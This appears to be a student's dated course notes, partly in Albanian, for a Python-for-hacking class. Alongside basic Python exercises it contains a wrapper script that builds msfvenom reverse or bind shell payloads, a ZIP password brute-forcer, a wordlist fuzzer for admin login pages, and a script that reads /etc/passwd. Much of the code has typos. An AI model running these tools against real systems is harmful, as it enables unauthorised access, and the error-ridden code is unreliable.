https://www.w3schools.com ########################################################################################## 27.08.2018, Day 1 python build by hackers can not exist as hacker without python cka eshte programimi cka eshte inzhinjeringu cka eshte gjuha programuse disa shtresa me shenja - low level communication me fol - high level low level = communikojm me machine level high level = me mujt me komuniku me human (python, java, c sharp etj) modulet = librari cka eshte python, dallimi me C python nuk e kompajllon kodin eshte gjuhe interpretuse gj. kompajlluse - marrrin kohe u executu, tani punon shpejt gj. interpretuse - shpejt exekutohen, kadale ne long term Day1 python >>> print "hello world" variabla >>> x = 1 >>> x = 12 >>> x = x + 1 string " " data types string integer >>>x = "fsdfsdf" >>>print type (x) str int - integjer, per numra %r = cka do qe i jep e shitn ne thojza %s %d True / False = raw_input = kur lyp input prej userit ------------------------------------------------- sfida 1 emrin mbiemrin moshen gjinin nacionalitetin status ------------------------------------------------ sfida 2 emrin mbiemi ID sa po don mi deponu sa po don mi terheq mosha lokacioni nenshtetsia ne fund me parqit shuma totale sa jan terhek sa jan mbet ########################################################################################## 29.08.2018, Day 2 variabla var = " " string print "Name: {} Surname: {} Num {}".format(name, surname, num) print "Name: %s Surname: %s Num: %d".format(name, surname, num) print "Name: "+name+" Surname: "+surname+" Num: "+num+" me marr inout ne useri target = raw_input("IP: ") num = input("Num: ") /print num print type(target) ---------------------------------------------------------- nano argv.py import sys print "Script name %s" % sys.arvg[0] [0] emri i scriptes print "Name %s" % sys.arvg[1] [1] emri print "Surname %s" % sys.arvg[2] [2] surname python argv.py python argv.py argument1 argument2 ----------------------------------------------- libraia OS per sys admin per hacking multi OS os.system("ls") os.system("ping -c 1 www.google.com") ------ import os import sys os.system("ping -c 1 {}".format(sys.argv[1]) python ping.py google.com ------- import os domain - raw_input("Domain: ") os.system("ping -c1 {}".format(domain)) python ping_raw.py Domain: google.com ------------------------------------------ tips and tricks get help pa internet if import os help(os) ------------------------------------------ nano update.py import os os.system("sudo apt-get update -y") python update.py ------------------------------------------ nano update.py import os "Startin update" os.system("sudo apt-get update -y") print "Update done" os.system("ccat /etc/passwd") print "System users ..." os.system("htop") python update.py ------------------------------------------ find my public IP import urllib2 print(urllib2.urlopen('http://ip.42.pl/raw').read()) ------------------------------------------ MSF payload #!/usr/bin/python import os import sys print "-"*100 print ("\t\t\tCreating a payload of your choice") print "-"*100 sistemi = raw_input("\nType the os that you want to hack: ") shell = raw_input("Type the payload form: ") bind = raw_input("Type the communication form that u want to use: ") ip = raw_input("Type you local ip: ") port = raw_input("Type your port: ") format = raw_input("Type format of the saving payload: ") name = raw_input("Type the name of the paylaod: ") print "-"*100 print "Now we will generate you payload, be patient....:)" print "-"*100 os.system("msfvenom -p %s/%s/%s LHOST=%s LPORT=%s -f %s > %s.%s" %(sistemi, shell, bind, ip, port, format, name, format)) print "-"*100 print "Now its doneee" print "-"*100 --------------------------------------------- import urllib2 import requester request.get("http://ickosovo.com") import netaddr import socket ########################################################################################## 31.08.2018, Day 3 #BRUTFOCRING A ZIP PASSWORD FILE nano BRUTEFORCE_A_ZIP_PASSWORD.py import sys import zipfile zip_file = zipfile.ZipFile(sys.argv[1]) for i in open(sys.argv[2],"r"): password = i.rstrip() try: zip_file.extractall(pwd=password) print "Password is: {}".format(password) break except: pass python unzip.py file.zip pwd.txt ########################################################################################## 03.09.2018, Day 4 logical statements import getpass = ########################################################################################## 05.09.2018, Day 5 urllin2 requests import urllib2 r = urllib2.urlopen("www.google.com") print r.getcode() #status code print r.read() #lexon example mkdir 1 mkdir 2 mkdir 3 mldir 4 nano index.html test txt ------ nano web_b.py import urllib2 import sys for i in range(1,5): r = urllib2.urlopen("{}/{}".format(sys.argv[1], i)) print r.getcode() web fuzzer ne gjet login page >>>import requests >>>r = requests.get("http://google.com") >>>print r.status_code 200 >>>r = requests.get("http://127.0.0.1/dssd") 404 print type(r.status_code) if r.status_code == 200: print "faqja ekzistion" else print "Nuk existon" >>> print r.status_code -------------------- nano adminfinder.py import sys import requesters for i in open(sys.argv[2], "r"): i = i.rstrip() r = requests.get("http://{}/{}".format(sys.argv[1],i)) if r.status_code == 200: print "http://{}/{}".format(sys.argv[1],i, r.status_code) python adminfinder.py 127.0.0.1 common.txt --------------------- download nje admin login wordlist cd/ var/vvv/html me wget url rm -rf latest.zip ~/Desktop/working folder python adminfinder.py 127.0.0.1 wordlist.txt sudo apt-get install python-pip sudo pip install requests >>> import urllib2 >>> r = urllib2.urlopen("http://127.0.0.1/index.html") >>> print r.read() CA >>> print r.read(); >>> if "CA" in r.read(): >>> if "CA" in data : >>> print True >>> r = urllib2.urlopen("http://127.0.0.1/index.html") >>> if "CA" in r.read(): print True True -------------------------- import requests r = requestes.get("http://ickosovo.com") print r.text -------------------------- import requests r = requests.post("http://ickosovo.com/login.php",data={"user":"cyber"}) -------------------------